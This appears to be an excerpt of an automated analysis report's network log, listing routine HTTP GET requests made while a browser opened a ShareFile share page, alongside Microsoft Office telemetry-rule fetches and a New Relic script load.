            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/50838dcfa76323d03647.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; AWSALBTGCORS=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; AWSALB=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; AWSALBCORS=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT
            Source: global trafficHTTP traffic detected: GET /bundles/c3b78c86faf44765071f.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; AWSALBTGCORS=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; AWSALB=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; AWSALBCORS=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT
            Source: global trafficHTTP traffic detected: GET /bundles/2df17ec2f6eaff4d4417.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; AWSALBTGCORS=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; AWSALB=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; AWSALBCORS=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT
            Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /nr-spa-1216.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/c3b78c86faf44765071f.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALBTGCORS=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALB=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J; AWSALBCORS=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J
            Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALBTGCORS=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALB=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J; AWSALBCORS=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J
            Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/50838dcfa76323d03647.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALBTGCORS=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALB=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J; AWSALBCORS=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J
            Source: global trafficHTTP traffic detected: GET /bundles/2df17ec2f6eaff4d4417.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALBTGCORS=3FrK8/DcQLzG9m+OsiuXXE50+3mtF14n9W++NcA/rMHlVmxVygZSoKV56V2LLqShiJ/+XavsoQlDqe+K16W+hKzo1fC6oRJa2pDAMnSpzLyjoGeDhIsrXyetikFHVz2zVI8kyPIF/naiaCGY7HbWejMGJZ47upmPQCl7nMNysPjr; AWSALB=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J; AWSALBCORS=QzNewPDHzjWhB5N3xBgkvFXoCr6kQsZMrtAVhpeu2u/yhzdzocxX4WFizZej1KUa01fCjy9jfukI5gNcg+IhBN7to+2qZvTdGb/p38GmCChd51zhzYvV2BYWh/5J
            Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=JVIVHWlVMHA+ygBn+siQVX7KzRRnJcIuQTIgznoBqsLxGrcuQgRDQhCEX1QOKLNWkkg6qp/nw2h/eNz1wgUDgfyfJF68fP9LKw1ihXF4WrYiIG63X+kP5mowbQBduQWtJY5Od6PKavudZmA30qJs4JD3zxpiBlWNOJy8qFs9lvZI; AWSALBTGCORS=JVIVHWlVMHA+ygBn+siQVX7KzRRnJcIuQTIgznoBqsLxGrcuQgRDQhCEX1QOKLNWkkg6qp/nw2h/eNz1wgUDgfyfJF68fP9LKw1ihXF4WrYiIG63X+kP5mowbQBduQWtJY5Od6PKavudZmA30qJs4JD3zxpiBlWNOJy8qFs9lvZI; AWSALB=i/Kl/FE/Or28gCRHUOOyWjMXL+X7PJxqEPQJdJhuNlMDzn8Hhoc1/JATLXomxg6HGst5fS8zT0mjK7qXqog3HETSWeMfZzRp0nMVrmLto5SClFg/AST8Vmg8t6cr; AWSALBCORS=i/Kl/FE/Or28gCRHUOOyWjMXL+X7PJxqEPQJdJhuNlMDzn8Hhoc1/JATLXomxg6HGst5fS8zT0mjK7qXqog3HETSWeMfZzRp0nMVrmLto5SClFg/AST8Vmg8t6cr
            Source: global trafficHTTP traffic detected: GET /nr-spa-1216.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /android-chrome-192x192.png HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=JVIVHWlVMHA+ygBn+siQVX7KzRRnJcIuQTIgznoBqsLxGrcuQgRDQhCEX1QOKLNWkkg6qp/nw2h/eNz1wgUDgfyfJF68fP9LKw1ihXF4WrYiIG63X+kP5mowbQBduQWtJY5Od6PKavudZmA30qJs4JD3zxpiBlWNOJy8qFs9lvZI; AWSALBTGCORS=JVIVHWlVMHA+ygBn+siQVX7KzRRnJcIuQTIgznoBqsLxGrcuQgRDQhCEX1QOKLNWkkg6qp/nw2h/eNz1wgUDgfyfJF68fP9LKw1ihXF4WrYiIG63X+kP5mowbQBduQWtJY5Od6PKavudZmA30qJs4JD3zxpiBlWNOJy8qFs9lvZI; AWSALB=i/Kl/FE/Or28gCRHUOOyWjMXL+X7PJxqEPQJdJhuNlMDzn8Hhoc1/JATLXomxg6HGst5fS8zT0mjK7qXqog3HETSWeMfZzRp0nMVrmLto5SClFg/AST8Vmg8t6cr; AWSALBCORS=i/Kl/FE/Or28gCRHUOOyWjMXL+X7PJxqEPQJdJhuNlMDzn8Hhoc1/JATLXomxg6HGst5fS8zT0mjK7qXqog3HETSWeMfZzRp0nMVrmLto5SClFg/AST8Vmg8t6cr
            Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveCorrelationId: chsq64HnRa3CnpP_6btCRgsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: 